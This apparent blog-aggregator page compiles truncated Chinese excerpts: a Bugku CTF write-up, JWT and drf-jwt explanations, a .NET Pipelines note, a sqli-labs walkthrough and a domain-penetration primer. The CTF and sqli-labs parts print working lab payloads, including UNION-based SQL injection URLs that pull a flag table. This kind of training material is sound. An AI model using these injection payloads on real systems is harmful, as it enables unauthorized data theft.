payload

Bugku-web-web8

空扰寡人 提交于 2019-12-05 22:03:47
可以看到题目提示了一个txt的东西,猜测目录下会有flag.txt这个文件。 通过代码审计我们可以知道得到flag的条件,访问flag.txt得到一串字符。 那么payload就很好构造了,$f的值是从$fn中得到的,而要得到flag我们则要使$ac === $f,那我们令ac=flags,f的值是从fn中取出来的那么也会是flags,条件成立得出flag。 payload: ?ac=flags&fn=flag.txt 这道题还有另外一种方式 先放出payload吧: ?ac=aaa&fn=php://input 同时post提交aaa php://input是可以访问请求的原始数据的只读流,读取POST数据,不可读取GET数据,我们post提交aaa,然后通过这种方式读取到aaa,也可以满足flag的条件。 php输入流php://input使用浅析 : https://blog.csdn.net/qq_14989227/article/details/79444940 CTF之php变量覆盖漏洞: https://www.jianshu.com/p/a4d782e91852 如果有错误之处,请联系QQ:365216308,我很菜。。 来源: https://www.cnblogs.com/HelloCTF/p/11946962.html

08 jwt源码剖析

一曲冷凌霜 提交于 2019-12-05 20:38:02
目录 08 jwt源码剖析 1. jwt认证流程 2.jwt创建token 3. jwt使用 4. 源码剖析 总结: 08 jwt源码剖析 JSON Web Tokens,是一种开发的行业标准 RFC 7519 ,用于安全的表示双方之间的声明。目前,jwt广泛应用在系统的用户认证方面,特别是现在前后端分离项目。 1. jwt认证流程 在项目开发中,一般会按照上图所示的过程进行认证,即:用户登录成功之后,服务端给用户浏览器返回一个token,以后用户浏览器要携带token再去向服务端发送请求,服务端校验token的合法性,合法则给用户看数据,否则,返回一些错误信息。 传统token方式和jwt在认证方面有什么差异? 传统token方式 用户登录成功后,服务端生成一个随机token给用户,并且在服务端(数据库或缓存)中保存一份token,以后用户再来访问时需携带token,服务端接收到token之后,去数据库或缓存中进行校验token的是否超时、是否合法。 jwt方式 用户登录成功后,服务端通过jwt生成一个随机token给用户(服务端无需保留token),以后用户再来访问时需携带token,服务端接收到token之后,通过jwt对token进行校验是否超时、是否合法。 2.jwt创建token 2.1 原理 jwt的生成token格式如下,即:由 . 连接的三段字符串组成。

第五章、drf-JWT认证

☆樱花仙子☆ 提交于 2019-12-05 18:57:30
目录 JWT认证 JWT认证方式与其他认证方式对比: 优点 格式 drf - jwt 插件 官网 安装 token的签发与校验初识: 签发token 校验token 自定义drf-jwt配置 settings.py 案例:实现多方式登陆签发token 总结: 案例:自定义认证反爬规则的认证类 总结: JWT认证 JWT认证方式与其他认证方式对比: 优点 1) 服务器不要存储token,token交给每一个客户端自己存储,服务器压力小 2)服务器存储的是 签发和校验token 两段算法,签发认证的效率高 3)算法完成各集群服务器同步成本低,路由项目完成集群部署(适应高并发) 格式 1) jwt token采用三段式:头部.载荷.签名 2)每一部分都是一个json字典加密形参的字符串 3)头部和载荷采用的是base64可逆加密(前台后台都可以解密) 4)签名采用hash256不可逆加密(后台校验采用碰撞校验) 5)各部分字典的内容: 头部:基础信息 - 公司信息、项目组信息、可逆加密采用的算法 载荷:有用但非私密的信息 - 用户可公开信息、过期时间 签名:头部+载荷+秘钥 不可逆加密后的结果 注:服务器jwt签名加密秘钥一定不能泄露 签发token:固定的头部信息加密.当前的登陆用户与过期时间加密.头部+载荷+秘钥生成不可逆加密 校验token:头部可校验也可以不校验

drf组件之jwt认证

半腔热情 提交于 2019-12-05 18:07:28
drf组件之jwt认证模块 一、认证规则 全称:json web token 解释:加密字符串的原始数据是json,后台产生,通过web传输给前台存储 格式:三段式 - 头.载荷.签名 - 头和载荷才有的是base64可逆加密,签名才有md5不可逆加密 内容: 头(基础信息,也可以为空):加密方式、公司信息、项目组信息、... 载荷(核心信息):用户信息、过期时间、... 签名(安全保障):头加密结果+载荷加密结果+服务器秘钥 的md5加密结果 认证规则: 后台一定要保障 服务器秘钥 的安全性(它是jwt的唯一安全保障) 后台签发token -> 前台存储 -> 发送需要认证的请求带着token -> 后台校验得到合法的用户 为什么要有jwt认证: 1) 后台不需要存储token,只需要存储签发与校验token的算法,效率远远大于后台存储和取出token完成校验 2) jwt算法认证,更适合服务器集群部署 二、认证模块 安装:pip install djangorestframework-jwt 模块包:rest_framework_jwt 采用drf-jwt框架,后期任务只需要书写登录 为什么要重写登录:drf-jwt只完成了账号密码登录,我们还需要手机登录,邮箱登录 为什么不需要重写认证类:因为认证规则已经完成且固定不变,变得只有认证字符串的前缀,前缀可以在配置文件中配置 三

JWT的详细简介

六眼飞鱼酱① 提交于 2019-12-05 17:52:34
1. JSON Web Token是什么 JSON Web Token (JWT)是一个开放标准(RFC 7519),它定义了一种紧凑的、自包含的方式,用于作为JSON对象在各方之间安全地传输信息。该信息可以被验证和信任,因为它是数字签名的。 2. 什么时候你应该用JSON Web Tokens 下列场景中使用JSON Web Token是很有用的: Authorization (授权) : 这是使用JWT的最常见场景。一旦用户登录,后续每个请求都将包含JWT,允许用户访问该令牌允许的路由、服务和资源。单点登录是现在广泛使用的JWT的一个特性,因为它的开销很小,并且可以轻松地跨域使用。 Information Exchange (信息交换) : 对于安全的在各方之间传输信息而言,JSON Web Tokens无疑是一种很好的方式。因为JWTs可以被签名,例如,用公钥/私钥对,你可以确定发送人就是它们所说的那个人。另外,由于签名是使用头和有效负载计算的,您还可以验证内容没有被篡改。 3. JSON Web Token的结构是什么样的 JSON Web Token由三部分组成,它们之间用圆点(.)连接。这三部分分别是: Header Payload Signature 因此,一个典型的JWT看起来是这个样子的: xxxxx.yyyyy.zzzzz 接下来,具体看一下每一部分:

Pipe——高性能IO(二)

本小妞迷上赌 提交于 2019-12-05 17:32:23
Pipelines - .NET中的新IO API指引(一) Pipelines - .NET中的新IO API指引(二) 关于 System.IO.Pipelines 的一篇说明 System.IO.Pipelines: .NET高性能IO System.IO.Pipelines 是对IO的统一抽象,文件、com口、网络等等,重点在于让调用者注意力集中在读、写缓冲区上,典型的就是 IDuplexPipe中的Input Output。 可以理解为将IO类抽象为读、写两个缓冲区。 目前官方实现还处于preview状态,作者使用Socket和NetworkStream 实现了一个 Pipelines.Sockets.Unofficial 作者在前两篇中提到使用System.IO.Pipelines 改造StackExchange.Redis,在本篇中作者采用了改造现有的SimplSockets库来说明System.IO.Pipelines的使用。 文章中的代码 ( SimplPipelines, KestrelServer ) ## SimplSockets说明 + 可以单纯的发送(Send),也可以完成请求/响应处理(SendRecieve) + 同步Api + 提供简单的帧协议封装消息数据 + 使用byte[] + 服务端可以向所有客户端广播消息 + 有心跳检测等等

sqli-labs通关记录

自古美人都是妖i 提交于 2019-12-05 14:55:58
环境搭建: https://www.cnblogs.com/kagari/p/11910749.html 在此基础上添加了一个flag数据库,库名flag,表名flag,字段名flag Less-1 http://172.16.124.149/Less-1/?id=0%27%20union%20select%201,2,flag%20from%20flag.flag%23 Less-2 http://172.16.124.149/Less-2/?id=0%20union%20select%201,2,flag%20from%20flag.flag Less-3 http://172.16.124.149/Less-3/?id=0%27)%20union%20select%201,2,flag%20from%20flag.flag%23 Less-4 http://172.16.124.149/Less-4/?id=0%22)%20union%20select%201,2,flag%20from%20flag.flag%23 Less-5 http://172.16.124.149/Less-5/?id=0%27%20union%20select%201,2,count(*)%20from%20mysql.user%20group%20by%20concat((select

Get custom payload of push notification while app is running background

穿精又带淫゛_ 提交于 2019-12-05 13:55:58
Hey can anybody tell how to get custom payload of push notification when app is in background? If your app is in the background and you receive a push notification and the user taps app "View", the application is launched and application:didFinishLaunchingWithOptions: would get called. In this case we can access custom notification payload via UIApplicationLaunchOptionsRemoteNotificationKey from userInfo dictionary. If your app is in the background and you receive a push notification and the user taps app icon, it brings the application to the foreground. When that happens, only

JSON Web Token

泄露秘密 提交于 2019-12-05 13:40:38
JSON Web Token(JWT)定义了一种紧凑的、自包含的方式,用于网络应用环境间传递声明而执行的一种基于JSON的开放标准。JWT传递的信息可以被验证和信任,因为它是数字签名的。JWTs可以使用一个密钥(使用HMAC算法)或使用RSA或ECDSA的公钥/私钥对来签名。 JSON Web Token的组成 JSON Web令牌由由点(.)分隔的三个部分组成: 1 Header 2 Payload 3 Signature 因此,JWT的结构通常是这样的:Header.Payload.Signature Header 头信息通常包含两部分,type:代表token的类型,这里使用的是JWT类型。 alg:使用的Hash算法,例如HMAC SHA256或RSA. 例如: { :“alg HS256”, :“typ JWT” } 然后,这个JSON是Base64Url编码,以形成JWT的第一部分。 Payload 第二个部分是荷载信息,它包含一些声明Claim(实体的描述,通常是一个User信息,还包括一些其他的元数据) signature 第三部分是一个签证信息,这个签证信息由三部分组成: 1、header (base64后的) 2、payload (base64后的) 3、secret 这部分需要base64加密后的header和base64加密后的payload使用“.

内网渗透之域渗透

纵然是瞬间 提交于 2019-12-05 11:53:24
1.初识域环境 什么是域 域是计算机网络的一种形式,其中所有用户帐户 ,计算机,打印机和其他安全主体都在位于称为域控制器的一个或多个中央计算机集群上的中央数据库中注册。 身份验证在域控制器上进行。 在域中使用计算机的每个人都会收到一个唯一的用户帐户,然后可以为该帐户分配对该域内资源的访问权限。 域(Domain)是将网络中多台计算机逻辑上组织到一起,进行集中管理,这种区别于工作组的逻辑环境叫做域。 域控 在一台机器上安装上活动目录(Active Directory)以后,这个机器就被成为域控。 在一个域中,可能存在多个域控,这些域控不分主域控制器与备份域控制器,每个域控制器充当的是一样的角色,比如你有三个域控制器,你可以在任何一个域控制器上对用户的权限进行修改,你的修改将被复制到其他两个域控制器中,这样,如果一个域控制器发生了故障,只要其他的域控还能正常工作,整个域还是可以正常运行。 活动目录(Active Directory) Active Directory存储了有关网络对象的信息,并且让管理员和用户能够轻松查找和使用这些信息,这些对象可以是用户、组群,计算机,控制站、邮件,配置文件,组织单元,树洗等等。 域用户 在域环境下使用的用户,其用户名和密码需要到域控制器上进行验证,验证通过后域用户可以在域内的任何一台机器上进行登录。但是域用户只是一个普通用户